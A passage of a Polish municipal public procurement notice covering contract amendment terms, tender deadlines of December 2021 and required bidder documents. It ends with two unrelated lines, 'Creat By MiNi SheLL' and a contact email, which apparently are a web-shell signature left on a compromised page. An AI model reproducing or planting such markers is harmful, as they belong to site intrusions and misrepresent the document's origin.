<br/>2. Zakazana jest zmiana postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, z zastrzeżeniem zmian wprowadzanych na podstawie art. 455 ustawy Pzp oraz zmian, o których mowa w ust. 3. <br/>3. Strony przewidują następujące rodzaje i warunki zmiany treści umowy: <br/>1) zmiana wysokości wynagrodzenia należnego Wykonawcy w przypadku: <br/>a) zmiana stawki podatku VAT. Stawka podatku VAT ulegnie zmianie odpowiednio do przepisów prawa wprowadzających zmianę stawki podatku VAT. <br/>2) zmiana terminu realizacji przedmiotu zamówienia w przypadku: <br/>a) działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie – o czas działania siły wyższej oraz czas potrzebny do usunięcia skutków tego działania, <br/>3) powierzenie Podwykonawcy lub dalszemu Podwykonawcy określonego zakresu prac po uprzednim zaakceptowaniu przez Zamawiającego z jednoczesną zmianą (rozszerzeniem) zapisu § 3 umowy poprzez wprowadzenie do umowy stosownych zapisów dotyczących Podwykonawcy, <br/>4) zmiana Podwykonawcy, dalszego Podwykonawcy lub rezygnacja z realizacji określonego zakresu zamówienia za pomocą Podwykonawcy lub dalszego Podwykonawcy. Jeżeli zmiana albo rezygnacja z Podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 ustawy Prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca zobowiązany jest wykazać Zamawiającemu, że proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż Podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia. Podwykonawcą, na którego zasoby powoływał się Wykonawca w złożonej ofercie, na zasadach określonych w art. 118 ust. 1 ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.zolkiewka.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-21 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy zobowiązani są złożyć następujące dokumenty oraz oświadczenia:<br/>1) Wypełniony i podpisany Formularz ofertowy (wg zał. nr 3) - w przypadku składania oferty przez<br/>podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich<br/>wykonawców składających ofertę wspólną oraz informację o części za mówienia, której<br/>wykonanie, wykonawca zamierza powierzyć podwykonawcom – w przypadku powierzenia przez<br/>wykonawcę części zamówienia podwykonawcom. Uwaga! W informacji należy podać również<br/>nazwy (firmy) podwykonawców, którym zostaną powierzone do wykonania części zamówienia (o<br/>ile są już znani na etapie składania ofert).<br/>2) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w<br/>postępowaniu zgodnie z art. 125 ust. 1 ustawy Pzp aktualne na dzień składania ofert.<br/>3) Odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba<br/>działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, chyba, że<br/>Wykonawca w formularzu oferty (zał. nr 3 do SWZ) wskaże dane umożliwiające dostęp do tych<br/>dokumentów samodzielnie przez Zamawiającego (poprzez np. podanie nr KRS, NIP, REGON).<br/>4) Informacja dot. powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia<br/>11 marca 2004 r. o podatku od towarów i usług w trybie art. 225 ust. 1 ustawy Pzp.<br/>5) W przypadku składania oferty wspólnej (wspólnego ubiegania się o zamówienie publiczne) do<br/>oferty należy dołączyć (dotyczy także wspólników spółki cywilnej):<br/>5.1.) Pełnomocnictwo, <br/>6) Dokumenty potwierdzające, że osoba działająca w imieniu Wykonawcy jest umocowana do<br/>jego reprezentacji:<br/>7.1) Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>wykonawcy – jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów, o których mowa w pkt 3. Postanowienia dotyczące<br/>pełnomocnictwa określone w przepisach Kodeksu Cywilnego stosuje się odpowiednio.<br/>7.2) Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania w<br/>postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 58 Pzp (dotyczy<br/>również wspólników spółki cywilnej), jeżeli w ich imieniu działa osoba, której umocowanie do<br/>reprezentowania nie wynika z dokumentów, o których mowa w pkt 3). Postanowienie dotyczące<br/>pełnomocnictwa określone w przepisach Kodeksu Cywilnego stosuje się odpowiednio.

Creat By MiNi SheLL
Email: jattceo@gmail.com